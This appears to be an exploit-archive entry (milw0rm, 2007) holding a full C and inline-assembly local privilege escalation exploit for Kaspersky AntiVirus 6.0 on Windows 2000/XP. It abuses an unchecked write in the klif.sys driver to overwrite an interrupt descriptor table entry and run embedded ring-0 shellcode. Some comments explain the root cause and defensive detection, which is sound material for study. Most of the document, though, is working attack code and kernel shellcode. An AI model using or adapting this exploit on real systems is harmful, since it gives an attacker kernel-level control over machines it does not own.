Kaspersky AntiVirus 6.0 - Local Privilege Escalation

🗓️ 15 Jan 2007 00:00:00Reported by MaDType 

Kaspersky AntiVirus 6.0 - Local Privilege Escalation: exploit code that creates a file with elevated (ring-0) privileges

Code
//	kav 6.0 0day local priv escalation exploit
//		by m4d 
//	http://unl0ck.net
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>


// r0-shellcode creates C:\Hello.txt with "Hello from ring-0! :)"

// Ring-0 payload (see the note above). The bytes embed readable strings —
// "ZwCreateFile", "ZwClose", "ZwWriteFile", the UTF-16 path "\??\C:\Hello.txt"
// and the message text — which make this blob easy to match with a static
// signature. It also appears to locate kernel exports by walking a PE export
// table (the 0x3C e_lfanew read near the end); verify in a disassembly.
unsigned char Shellcode[405] = {
	0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xBC, 0x60, 0x83, 0x4D, 0xE8, 0xFF, 0x0F, 0x01, 0x4D, 0xFA, 0x8B, 
	0x4D, 0xFC, 0x81, 0xC1, 0x50, 0x01, 0x00, 0x00, 0x66, 0x8B, 0x71, 0x06, 0xC1, 0xE6, 0x10, 0x66, 
	0x8B, 0x31, 0x4E, 0x66, 0x81, 0x3E, 0x4D, 0x5A, 0x75, 0xF8, 0x8B, 0x46, 0x3C, 0xA9, 0x00, 0xFF, 
	0xFF, 0xFF, 0x75, 0xEE, 0x81, 0x3C, 0x30, 0x50, 0x45, 0x00, 0x00, 0x75, 0xE5, 0xE8, 0x00, 0x00, 
	0x00, 0x00, 0x58, 0x8D, 0x90, 0xB7, 0x00, 0x00, 0x00, 0x8D, 0x5A, 0x58, 0x8B, 0xC6, 0x6A, 0x0D, 
	0x59, 0xFF, 0xD3, 0x89, 0x45, 0xEC, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x08, 0x59, 0xFF, 0xD3, 0x89, 
	0x45, 0xF0, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x0C, 0x59, 0xFF, 0xD3, 0x89, 0x45, 0xF4, 0x03, 0xD1, 
	0x89, 0x55, 0xE4, 0x6A, 0x20, 0x58, 0x66, 0x89, 0x45, 0xE0, 0x66, 0x89, 0x45, 0xE2, 0x8D, 0x4D, 
	0xC0, 0xC7, 0x01, 0x18, 0x00, 0x00, 0x00, 0x83, 0x61, 0x04, 0x00, 0xC7, 0x41, 0x0C, 0x00, 0x02, 
	0x00, 0x00, 0x83, 0x61, 0x10, 0x00, 0x8D, 0x45, 0xE0, 0x89, 0x41, 0x08, 0x83, 0x61, 0x14, 0x00, 
	0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x20, 0x6A, 0x03, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x8D, 0x45, 
	0xD8, 0x50, 0x8D, 0x45, 0xC0, 0x50, 0x68, 0x04, 0x00, 0x10, 0x00, 0x8D, 0x45, 0xBC, 0x50, 0xFF, 
	0x55, 0xEC, 0x85, 0xC0, 0x75, 0x2D, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x17, 0x8B, 0x45, 0xE4, 0x0F, 
	0xB7, 0x4D, 0xE0, 0x03, 0xC1, 0x50, 0x8D, 0x45, 0xD8, 0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 
	0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF4, 0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF0, 0xC7, 0x45, 0xE8, 0xEF, 
	0xBE, 0xAD, 0xDE, 0x61, 0x8B, 0x45, 0xE8, 0xC9, 0xCF, 0x5A, 0x77, 0x43, 0x72, 0x65, 0x61, 0x74, 
	0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5A, 0x77, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x00, 0x5A, 0x77, 
	0x57, 0x72, 0x69, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5C, 0x00, 0x3F, 0x00, 0x3F, 0x00, 
	0x5C, 0x00, 0x43, 0x00, 0x3A, 0x00, 0x5C, 0x00, 0x48, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x6C, 0x00, 
	0x6F, 0x00, 0x2E, 0x00, 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 0x20, 
	0x66, 0x72, 0x6F, 0x6D, 0x20, 0x72, 0x69, 0x6E, 0x67, 0x2D, 0x30, 0x21, 0x20, 0x3A, 0x29, 0x0D, 
	0x0A, 0x60, 0x8B, 0x50, 0x3C, 0x8B, 0x54, 0x10, 0x78, 0x03, 0xD0, 0x8B, 0x5A, 0x20, 0x03, 0xD8, 
	0x33, 0xED, 0x8B, 0x4A, 0x18, 0x51, 0x8B, 0x4C, 0x24, 0x1C, 0x8B, 0x33, 0x03, 0xF0, 0x8B, 0x7C, 
	0x24, 0x18, 0xF3, 0xA6, 0x59, 0x74, 0x06, 0x45, 0x83, 0xC3, 0x04, 0xE2, 0xE8, 0x8B, 0x4A, 0x24, 
	0x03, 0xC8, 0x0F, 0xB7, 0x0C, 0x69, 0x8B, 0x6A, 0x1C, 0x03, 0xE8, 0x95, 0x03, 0x2C, 0x88, 0x89, 
	0x6C, 0x24, 0x1C, 0x61, 0xC3
};




// Request block handed to the klif.sys control path (per the original comments).
// The driver dispatches on SwitchIndex, and Value is the DWORD it writes to the
// address passed alongside this block — a write with caller-controlled address
// *and* data, which is the defect this listing demonstrates. A fixed driver must
// validate both before writing (and restrict who may reach this path at all).
typedef struct _FIRST_PARAM {
	ULONG	SwitchIndex;		// selects the case in the driver's switch() that performs the write
	ULONG	Unknown;			// 0xFF0002...0xFF000F; if this value is not in klif.sys's list, the exploit won't work
	ULONG	Value;				// the DWORD the driver writes to the supplied address
} FIRST_PARAM, *PFIRST_PARAM;





//-----------------------------------------------------------------------
// Entry point of the proof-of-concept.
//
// Flow as written: (1) refuse anything but Windows NT 5.0/5.1 (2000/XP),
// because the raw system-service numbers below are hard-coded per version;
// (2) probe for KAV with one service call; (3) use the klif.sys control path
// (see FIRST_PARAM) to overwrite one IDT entry, one DWORD at a time, so that
// it points at Shellcode; (4) fire that interrupt so the ring-0 payload runs.
//
// Root cause (from the struct comments): the driver writes a caller-supplied
// DWORD to a caller-supplied kernel address without validating either.
// Defensive notes: the fix belongs in the driver (validate the request and
// restrict access to its control device); `sidt` from ring 3, used below to
// find the IDT, is refused on CPUs/OSes that enable UMIP; and an unprivileged
// process issuing raw `int 2Eh` service calls is itself anomalous behaviour.
//
// Listing quality: `void main` is non-standard (should return int);
// `__except(1)` is EXCEPTION_EXECUTE_HANDLER written as a bare literal;
// the `$+N` jumps depend on the exact encoded length of the neighbouring
// instructions — confirm in a disassembly before trusting them.
//-----------------------------------------------------------------------
void main(int argc, char* argv[])
{
	__try
	{
		FIRST_PARAM			Param1;
		ULONG				Param2;		// pointer to write DATA - 8 (target address handed to the driver)
		CHAR				Idtr[6];	// raw IDTR image: 16-bit limit, then 32-bit base at offset 2
		CHAR				IsKAVInstalled;
		OSVERSIONINFOEX		os;


		os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
		GetVersionEx((LPOSVERSIONINFO)&os);

		// Only NT 5.0 (2000) and 5.1 (XP): the service numbers below are per-version.
		if (os.dwPlatformId != VER_PLATFORM_WIN32_NT ||
			os.dwMajorVersion != 5 ||
			os.dwMinorVersion > 1)
		{
			printf("This OS version unsupported\n");
			return;
		}

		// First, determine whether KAV is installed or not
		// (one service call, selected by OS minor version; 0Ch in eax is taken as "present").

		__asm {
			cmp		os.dwMinorVersion, 0
			jnz		short $+13
			mov		eax, 0F8h		// 2k
			jmp		short $+7
			mov		eax, 11Ch		// xp
			int		2Eh

			cmp		eax, 0Ch
			setz	al
			mov		IsKAVInstalled, al
		}

		if (!IsKAVInstalled)
		{
			printf("KAV6 didn't installed\n");
			return;
		}

		Param1.SwitchIndex = 3;		// Index of jmp in case of switch()
		Param1.Unknown = 0xFF0002;

		__asm {
			pusha
			sidt	Idtr					// IDTR is readable from ring 3 here (no UMIP on these systems)

			mov		eax, dword ptr [Idtr+2]	// eax = IDT base

			add		eax, 0DAh * 8 - 8		// entry 0xDA, minus the 8 the driver adds (see Param2 comment)
			mov		Param2, eax

			// Write lower DWORD IdtEntry

			mov		ecx, offset Shellcode
			and		ecx, 0000FFFFh
			or		ecx, 00080000h
			mov		Param1.Value, ecx	// Set DWORD: [selector 0x0008 | LOWORD(Shellcode)]

			push	Param2
			lea		eax, Param1
			push	eax

			mov		edx, esp				// edx = pointer to the two stacked arguments
			cmp		os.dwMinorVersion, 0
			jnz		short $+13
			mov		eax, 100h		// 2k
			jmp		short $+7
			mov		eax, 124h		// xp
			int		2Eh
			add		esp, 2*4

			// Write high DWORD IdtEntry

			add		Param2, 4

			mov		ecx, offset Shellcode
			and		ecx, 0FFFF0000h
			or		ecx,  0000EE00h
			mov		Param1.Value, ecx	// Set DWORD: [HIWORD(Shellcode) | gate parameters 0xEE00]

			push	Param2
			lea		eax, Param1
			push	eax

			mov		edx, esp
			cmp		os.dwMinorVersion, 0
			jnz		short $+13
			mov		eax, 100h		// 2k
			jmp		short $+7
			mov		eax, 124h		// xp
			int		2Eh
			add		esp, 2*4

			// Call Gate :-) (COLGATE)
			// fs is saved/restored around the interrupt because the payload runs
			// outside the normal kernel entry path and may leave it changed.

			push	fs
			int		0DAh
			pop		fs

			popa
		}

		printf("Exploited successful\n");
	}
	__except(1) {				// EXCEPTION_EXECUTE_HANDLER: any fault above (e.g. a bad gate) lands here
		printf("Can't create interrupt gate\n");
	}
}

// 15.01.07 MaD

// milw0rm.com [2007-01-15]
